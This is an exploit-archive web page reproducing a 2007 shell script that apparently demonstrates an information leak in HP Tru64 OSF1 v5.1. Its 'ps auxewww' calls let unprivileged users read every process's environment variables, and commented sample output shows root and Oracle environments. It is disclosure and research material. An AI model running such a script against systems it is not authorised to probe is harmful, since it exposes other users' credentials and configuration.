首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HP Tru64 Alpha OSF1 v5.1 (ps) Information Leak Exploit
来源:http://rawlab.mindcreations.com 作者:Andrea 发布时间:2007-02-07  
#!/bin/ksh
#
# osf1tru64ps.ksh exploit
# Tested on OSF1 V5.1 1885 alpha
#
# ps executable - information leak
#
# Author: Andrea "bunker" Purificato
#         http://rawlab.mindcreations.com
#
# the "ps" command (also /usr/ucb/ps) on HP OSF1 v5.1 Alpha,
# developed without an eye to security, allows unprivileged users to see
# values of all processes environment variables.
#
# Useful during information discovery.
#
# fake_uname> uname -a          
# OSF1 fake_uname V5.1 1885 alpha
#
# fake_uname> id
# uid=301(fake_user) gid=216(fake_gid)
#
# fake_uname> /usr/ucb/ps auxeww
# USER            PID %CPU %MEM   VSZ  RSS TTY      S    STARTED         TIME COMMAND
# ...
# ...
# root        1038875  0.0  0.0 2.02M 184K ??       I    11:39:03     0:00.01 sleep 55 MANPATH=/usr/share/man:/usr/dt/share/man:/usr/local/man:/usr/opt/networker/man:/usr/local/openssh/bin PATH=/sbin:/bin:/usr/bin:/usr/sbin:/sbin:/bin:/usr/bin:/usr/sbin:/sbin:/usr/sbin:/usr/bin:/usr/ccs/bin:/usr/bin/X11:/usr/local:/usr/local/openssh/bin:/usr/opt/networker/bin LOGNAME=root USER=root SHELL=/bin/ksh HOME=/ TERM=vt100 PWD=/opt/AmosLite_Client...
# ...
# ...
# root        1009950  0.0  0.0 2.73M 840K ??       I <    Sep 30     0:31.22 /usr/sbin/auditd -l /LOG_SOURCE/audit/auditlog HOME=/ LOGNAME=root MANPATH=/usr/share/man:/usr/dt/share/man:/usr/local/man:/usr/opt/networker/man:/usr/local/openssh/bin PATH=/sbin:/usr/sbin:/usr/bin:/usr/ccs/bin:/usr/bin/X11:/usr/local:/usr/local/openssh/bin:/usr/opt/networker/bin PWD=/var/audit SHELL=/bin/ksh TERM=xterm USER=root...
# ...
# ...
# oracle       541177  0.0  0.0 28.2M 3.4M ??       S      Sep 01     0:07.00 /app/oracle/product/9.2.0/Apache/Apache/bin/httpd -d /app/oracle/product/9.2.0/Apache/Apache HOME=/app/oracle LD_LIBRARY_PATH=/app/oracle/product/9.2.0/lib:/app/oracle/product/9.2.0/lib:/app/oracle/product/9.2.0/obackup/lib: LOGNAME=oracle NLS_LANG=AMERICAN_AMERICA.WE8MSWIN1252 OBK_HOME=/app/oracle/product/9.2.0/obackup ORACLE_BACKUP=/app/oracle/BACKUP ORACLE_BASE=/app/oracle ORACLE_DOC=/app/oracle/product/9.2.0/oradoc ORACLE_HOME=/app/oracle/product/9.2.0 ORACLE_PATH=/app/oracle/product/9.2.0/oracle ORACLE_SID=...
# ...
# ...
#
echo "Tru64 Alpha OSF1 V5.1 1885  - ps information leak"
echo "Andrea \"bunker\" Purificato - http://rawlab.mindcreations.com"
echo ""
echo "Default ps executable: "
ps auxewww

echo "/usr/ucb/ps executable: "
/usr/ucb/ps auxewww

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Oracle 9i/10g DBMS_EXPORT_EXTE
·FlashFXP 3.4.0 build 1145 Remo
·MS Internet Explorer 6 (mshtml
·SmartFTP Client 2.0.1002 Remot
·GGCMS <= 1.1.0 RC1 Remote Code
·Categories hierarchy phpBB Mod
·阿里巴巴支付宝远程代码执行漏洞
·Imail 8.10-8.12 (RCPT TO) Remo
·Imail 8.10-8.12 (RCPT TO) Remo
·Advanced Poll <= 2.0.5-dev Rem
·Woltlab Burning Board Lite <=
·Site-Assistant <= v0990 (paths
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved